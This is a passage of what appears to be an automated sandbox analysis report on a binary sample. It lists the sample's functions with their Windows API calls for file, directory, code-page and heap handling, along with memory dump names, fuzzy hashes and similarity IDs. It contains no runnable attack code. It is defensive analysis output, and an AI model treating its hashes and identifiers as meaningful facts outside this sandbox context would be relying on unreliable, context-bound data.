Opcode Fuzzy Hash: 7f0ad6d8bb1a827f26d5768bd5369798f55f225ea4be465db49d1af210478ac6
Instruction Fuzzy Hash: F631E57120870A9BDF548F14DD4876ABBA8FB90710F044A5DF985DB1D2CB74DD48CBA2

Function 0080A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A22E
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A261
GetLastError.KERNEL32(?,?,?,?,0080A113,?,00000001,00000000,?,?), ref: 0080A27E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CreateDirectory$ErrorLast
String ID:
API String ID: 2485089472-0
Opcode ID: 627bef66c21d49fb43c54c68f742acc6ee066f79ef5094a135421a133ba9ba92
Instruction ID: 06ac665dd96c33fa314ef92cb6abf362aed60fa1995f71730a5b247f6b54c7f8
Opcode Fuzzy Hash: 627bef66c21d49fb43c54c68f742acc6ee066f79ef5094a135421a133ba9ba92
Instruction Fuzzy Hash: 8B01F53564171866DBBA9B788C06BED334CFF0A781F040861F801E60D1C766CA80C6B3

Function 0082AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0082B019

Strings

, xrefs: 0082B05E

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Info
String ID:
API String ID: 1807457897-3916222277
Opcode ID: 76ec90bd70968d21524ab4dc553ba01b6f61b3694fc7e7aadae5f84d73e3d8ea
Instruction ID: 8a9a63aa038482df6c37d6b6366149c6d0a787787295fb743d0cc55c7dbfdeb0
Opcode Fuzzy Hash: 76ec90bd70968d21524ab4dc553ba01b6f61b3694fc7e7aadae5f84d73e3d8ea
Instruction Fuzzy Hash: 9A41287050536CAADF228E28DC94AF7BBA9FF45308F1404ECE59AC7142D3359A95DF20

Function 0082A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0082A79D

Strings

LCMapStringEx, xrefs: 0082A73D, 0082A747

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 58b7da5e1dce11d5ec490ae9322ab4a7b019c3f9a24654820630f49bf166758a
Instruction ID: 9ca30958b33598f86233b81ccce9a91e6de4c1b62f5ca6a299d747bca6362e0a
Opcode Fuzzy Hash: 58b7da5e1dce11d5ec490ae9322ab4a7b019c3f9a24654820630f49bf166758a
Instruction Fuzzy Hash: E901137250021CBBCF166FA4EC02DEE3F66FF48710F004554FE14A6260CA7A8A71EB92

Function 0082A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00829D2F), ref: 0082A715

Strings

InitializeCriticalSectionEx, xrefs: 0082A6E5

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 89053077b4032f42c76826f104122780c73eff678b0ffd35a7893818232bccc2
Instruction ID: 87d3e33c2a4c802a4aa547ba31442332c5118471305e9044bb71ec6d27219656
Opcode Fuzzy Hash: 89053077b4032f42c76826f104122780c73eff678b0ffd35a7893818232bccc2
Instruction Fuzzy Hash: FAF02E3060421CBBCB146F28DC06CAE7FA0FF94720F404014FC199A360DAB68A50EBC1

Function 0082A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 0082A5AE

Strings

FlsAlloc, xrefs: 0082A58A

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: e51bbced5caa362e5c4690af65625bf6cb7d9787da638e0f14d98f7c81e040e7
Instruction ID: 804b07bfab24babd4351703105a22e39b5948cb21e018fa106ffd2cd071bf0ad
Opcode Fuzzy Hash: e51bbced5caa362e5c4690af65625bf6cb7d9787da638e0f14d98f7c81e040e7
Instruction Fuzzy Hash: 10E055B074522C6B96246FA8AC028AEBB94FFA4711F400018FC05D7340EEB88E00A6D6

Function 0082329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

try_get_function.LIBVCRUNTIME ref: 008232AF

Strings

FlsAlloc, xrefs: 0082329E, 008232A8

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: try_get_function
String ID: FlsAlloc
API String ID: 2742660187-671089009
Opcode ID: 5cfaef653e0c887f3ef64387cc1369fc683b5b271af7d1f07392f599197bceb5
Instruction ID: 9c3f5d91da499c51c55bfe443b054f84b9dfc4fb25d338c1648bf9513cd111c5
Opcode Fuzzy Hash: 5cfaef653e0c887f3ef64387cc1369fc683b5b271af7d1f07392f599197bceb5
Instruction Fuzzy Hash: 8FD02B217806347B811032C4BC039AE7F44FB41FB2F450552FE08DA342B5A9459001C6

Function 0081E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0081E20B

Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7

Strings

3Qo, xrefs: 0081E1F9, 0081E205

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Qo
API String ID: 1269201914-1944013411
Opcode ID: 33f30903de9226425152a4999d07c74864936e00eb62883b0101584c57dbbd96
Instruction ID: ee3d91c840886574b55fa07fcc823272cdc1564a64b512d594a7f5d6cf854ce6
Opcode Fuzzy Hash: 33f30903de9226425152a4999d07c74864936e00eb62883b0101584c57dbbd96
Instruction Fuzzy Hash: 05B012E226E5027C320C1149BD16DB7031CFCC0B50330801AB716D40809A414D8A4033

Function 0082B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0082AF1B: GetOEMCP.KERNEL32(00000000,?,?,0082B1A5,?), ref: 0082AF46

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0082B1EA,?,00000000), ref: 0082B3C4
GetCPInfo.KERNEL32(00000000,0082B1EA,?,?,?,0082B1EA,?,00000000), ref: 0082B3D7

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: ffefdbfeb002dbf0b405ec27cc7cbce1574e28f122157e2d31bfc9569926f43a
Instruction ID: ad46812621128dcaf4f4b4608bef5602d263e3bd32f2f86973d2c9e6d22a292f
Opcode Fuzzy Hash: ffefdbfeb002dbf0b405ec27cc7cbce1574e28f122157e2d31bfc9569926f43a
Instruction Fuzzy Hash: 0E5145B09012259FDB24AF75E8C06BABBE4FF50310F18446ED096CB253D73595C1CB85

Function 00801385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00801385

Part of subcall function 00806057: __EH_prolog.LIBCMT ref: 0080605C

Part of subcall function 0080C827: __EH_prolog.LIBCMT ref: 0080C82C
Part of subcall function 0080C827: new.LIBCMT ref: 0080C86F
Part of subcall function 0080C827: new.LIBCMT ref: 0080C893

new.LIBCMT ref: 008013FE

Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: caa11ae97dd8d6700baaa3e945ec15c9d60b2a56ed217e9f3a8f1c598145214a
Instruction ID: 3cc58ff20a820f28d563af548d398bd4591c641bdba3f24967d3cc665a5bd9a2
Opcode Fuzzy Hash: caa11ae97dd8d6700baaa3e945ec15c9d60b2a56ed217e9f3a8f1c598145214a
Instruction Fuzzy Hash: 534116B0905B409ED724DF7988859E7FAE6FF18310F504A2ED6EEC3282DB326554CB16

Function 00801380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00801385

Part of subcall function 00806057: __EH_prolog.LIBCMT ref: 0080605C

Part of subcall function 0080C827: __EH_prolog.LIBCMT ref: 0080C82C
Part of subcall function 0080C827: new.LIBCMT ref: 0080C86F
Part of subcall function 0080C827: new.LIBCMT ref: 0080C893

new.LIBCMT ref: 008013FE

Part of subcall function 0080B07D: __EH_prolog.LIBCMT ref: 0080B082

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: dcfbad214cbd64f74e492db80747a5af0d59997fec27dc31c2b5e81ecbb453d6
Instruction ID: ba030e1cc996ae4b845d579a7c7150458673de51eb21580afc5b0e4d3c0f8b6e
Opcode Fuzzy Hash: dcfbad214cbd64f74e492db80747a5af0d59997fec27dc31c2b5e81ecbb453d6
Instruction Fuzzy Hash: 1D4106B0805B409ED724DF7988859E7FAE5FF18310F544A2ED6EEC3282DB326554CB16

Function 0082B188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00828FA5: GetLastError.KERNEL32(?,00840EE8,00823E14,00840EE8,?,?,00823713,00000050,?,00840EE8,00000200), ref: 00828FA9
Part of subcall function 00828FA5: _free.LIBCMT ref: 00828FDC
Part of subcall function 00828FA5: SetLastError.KERNEL32(00000000,?,00840EE8,00000200), ref: 0082901D
Part of subcall function 00828FA5: _abort.LIBCMT ref: 00829023

Part of subcall function 0082B2AE: _abort.LIBCMT ref: 0082B2E0
Part of subcall function 0082B2AE: _free.LIBCMT ref: 0082B314

Part of subcall function 0082AF1B: GetOEMCP.KERNEL32(00000000,?,?,0082B1A5,?), ref: 0082AF46

_free.LIBCMT ref: 0082B200
_free.LIBCMT ref: 0082B236

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 55c821e8089afac7ee4120965f9771ee102dc732222d4377c96ab26e45c3f628
Instruction ID: b845e6cf095605fa5f710191ee7469bbe9e0144c6bf6d2b73c25834c70643455
Opcode Fuzzy Hash: 55c821e8089afac7ee4120965f9771ee102dc732222d4377c96ab26e45c3f628
Instruction Fuzzy Hash: 8031AD31906228EFDB10EFA9E841BADB7E5FF45320F254099E814DB291EB729D81CB51

Function 0080971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00809EDC,?,?,00807867), ref: 008097A6
CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00809EDC,?,?,00807867), ref: 008097DB

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e34ae227e508bd7cbfcfd13cd231956ad483ec71828047fda4b5cf16fcacf72e
Instruction ID: 203444ff7ad37d6ac17f371634418b279b425ca476e2467824e8769c6af4696d
Opcode Fuzzy Hash: e34ae227e508bd7cbfcfd13cd231956ad483ec71828047fda4b5cf16fcacf72e
Instruction Fuzzy Hash: 7D21E1B2114748AEE7708F64CC85BA7B7E8FB49764F00492DF5E5C21E2C374AC898A61

Function 00809D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00807547,?,?,?,?), ref: 00809D7C
SetFileTime.KERNELBASE(?,?,?,?), ref: 00809E2C

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 97d82b14a36bd2fcbe844b0b14427b27d7d1d215a7fb9c0b1d02d245c52dfe6a
Instruction ID: fce17eec809f63cfbdb1b4364db5f791c6c0bbb5f6640114d0c62b5ec54580a6
Opcode Fuzzy Hash: 97d82b14a36bd2fcbe844b0b14427b27d7d1d215a7fb9c0b1d02d245c52dfe6a
Instruction Fuzzy Hash: 3B21D631188246ABC754DE24CC51AABBBE8FF96708F04081DF8D1C7182D329DA4CDB51

Function 0082A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00833958), ref: 0082A4B8
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 0082A4C5

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 9994737ed52fbe3ce4d46eeb31fd9b96741245ae72db0e450fd6cc630c9d2216
Instruction ID: 8ad4f23b07f9a8a9a94c5bb1c70f2556ed9397fc7ce17abb0d8804d932d50956
Opcode Fuzzy Hash: 9994737ed52fbe3ce4d46eeb31fd9b96741245ae72db0e450fd6cc630c9d2216
Instruction Fuzzy Hash: 1B11E333A016359B9B2AAE28FC458AA7395FF803247164620ED15EB284EA74DCC1C6D6

Function 00809B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00809B35,?,?,00000000,?,?,00808D9C,?), ref: 00809BC0
GetLastError.KERNEL32 ref: 00809BCD

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b0b4d906057e185f19a8322acd0d19b153026661dab2ca2577f0bbece74b03ee
Instruction ID: 9fe232f2bee274d8bea4b700478e8df2c58fd08163d15172b399519034e45a8d
Opcode Fuzzy Hash: b0b4d906057e185f19a8322acd0d19b153026661dab2ca2577f0bbece74b03ee
Instruction Fuzzy Hash: 200104313052299BCB48CE29ACA487EB399FFC1331B10852DF892C32C2DA30D8059A21

Function 00809E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00809E76
GetLastError.KERNEL32 ref: 00809E82

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 272ac8874eac29eb26057a7dd28a3420d47c7216710c36647f0a8d207f202097
Instruction ID: e67e7b16dcac41e1d4c774932b20de2ec82cbba22f671a4e72948dfa8ab20ae2
Opcode Fuzzy Hash: 272ac8874eac29eb26057a7dd28a3420d47c7216710c36647f0a8d207f202097
Instruction Fuzzy Hash: F0019E713052045BEB74DE69DC44B6BB6D9FB88328F14493EF286C26D1DAB5EC488611

Function 00828606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00828627

Part of subcall function 00828518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0082C13D,00000000,?,008267E2,?,00000008,?,008289AD,?,?,?), ref: 0082854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00840F50,0080CE57,?,?,?,?,?,?), ref: 00828663

Memory Dump Source

Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true

Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 9ce6fcf8416d1d6272643955b39385414b59737af296663699dba79ca928310f
Instruction ID: 23ca2bbdb5be33288278a9815d28663c7f03dde7c4009efefa7a76ebb03229f0
Opcode Fuzzy Hash: 9ce6fcf8416d1d6272643955b39385414b59737af296663699dba79ca928310f
Instruction Fuzzy Hash: 74F0C231103135EACF312A2ABC08B6B3B58FFF1BB1F248115F814D6191DF20C8C095A6

Function 00810908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

